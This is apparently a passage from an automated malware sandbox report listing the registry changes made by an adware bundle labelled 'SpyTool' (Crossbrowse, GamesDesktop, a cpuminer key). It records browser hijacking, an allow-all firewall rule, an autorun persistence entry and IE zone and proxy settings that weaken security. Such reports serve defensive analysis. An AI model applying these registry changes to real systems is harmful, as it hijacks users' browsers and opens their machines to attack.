"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "Crossbrowse"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"DisplayIcon" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKCR\https]
"URL Protocol" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"pv" = "39.6.2171.95"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"InstallDate" = "20150902"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\InstallInfo]
"ShowIconsCommand" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --show-icons"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"

[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"Path" = "%Program Files%\Crossbrowse\Crossbrowse\Application"

[HKCR\HTTP]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse]
"(Default)" = "Crossbrowse"

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "Crossbrowse"

[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "Crossbrowse"

[HKCR\CRSBRWSHTML]
"(Default)" = "Crossbrowse HTML Document"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"Name" = "Crossbrowse"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"VersionMinor" = "95"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossbrowse]
"NoModify" = "1"

[HKLM\SOFTWARE\RegisteredApplications]
"Crossbrowse" = "Software\Clients\StartMenuInternet\Crossbrowse\Capabilities"

[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"

[HKCR\ftp\shell]
"(Default)" = "open"

[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\DefaultIcon]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\delegate_execute.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\crossbrowse.exe]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe"

[HKLM\SOFTWARE\Crossbrowse\Installer]
"InstallerResult" = "0"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Crossbrowse"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe -- %1"

[HKLM\SOFTWARE\Clients\StartMenuInternet\Crossbrowse\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Crossbrowse\Crossbrowse\Application]
"crossbrowse.exe" = "%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe:*:Enabled:Crossbrowse"

The SpyTool deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Crossbrowse\Installer]
"ap"
"InstallerExtraCode1"

The process taskkill.exe:640 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 4B 26 41 07 0D F2 51 5C 12 12 79 63 75 50 EA"

The process taskkill.exe:584 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 8C 29 9E 8F C4 1A DF 23 B4 D4 F0 3E 5D 16 2D"

The process taskkill.exe:952 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 A1 EC F9 0B 25 64 A2 DF 9D F9 68 31 7F 53 66"

The process upgmsd_re_005010077.exe:1364 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010077"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "4A8590D6-D6DC-4C45-871E-B58D1E7D2C38"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 05 A0 7F 61 22 21 85 6A C0 55 01 7D 9B 5E 04"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010077.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe -runhelper"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process amisid.exe:1512 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 D6 6D 34 18 45 12 7C 1A C4 4F 22 BD 00 D4 24"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\InternetTurbo]
"UID" = "6FE5DDD064E91F40D31A83BB9FE8886E"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

The process amisid.exe:1556 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKCU\Software\InternetTurbo]
"UID" = "6FE5DDD064E91F40D31A83BB9FE8886E"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 96 C9 29 73 80 08 DD 71 13 7F C1 A4 3E 99 D2"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""

The SpyTool deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"

The process tasklist.exe:164 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 9A F1 81 6D 97 38 E3 2B D0 F9 33 28 7D 95 79"

The process tasklist.exe:1540 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 97 0A C9 A3 43 D3 B0 AF 04 F7 43 6C D0 12 32"

The process nsm25.tmp:240 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1D.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\Registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr21.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2A.tmp\Registry.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 F4 7B 71 13 0F 0B 16 89 AD 08 59 3A 27 6A E3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nst16.tmp:1340 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 B9 28 2C B4 BE 4D C0 94 94 92 61 8D A7 D1 1F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsh2B.tmp:344 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Tutorials\updv]
"Version" = "15.09.01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"Inno Setup: User" = "%CurrentUserName%"
"Inno Setup: Setup Version" = "5.5.5 (a)"
"URLUpdateInfo" = "http://re.gamesdesktop.com"
"URLInfoAbout" = "http://re.gamesdesktop.com"
"Inno Setup: Icon Group" = "GAMESDESKTOP"
"HelpLink" = "http://re.gamesdesktop.com"
"Publisher" = "GAMESDESKTOP"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010077\unins000.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"DisplayName" = "GamesDesktop 092.005010077"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\TutoTag]
"OnceInstalled" = "re"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010077_is1]
"Inno Setup: Language" = "re"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
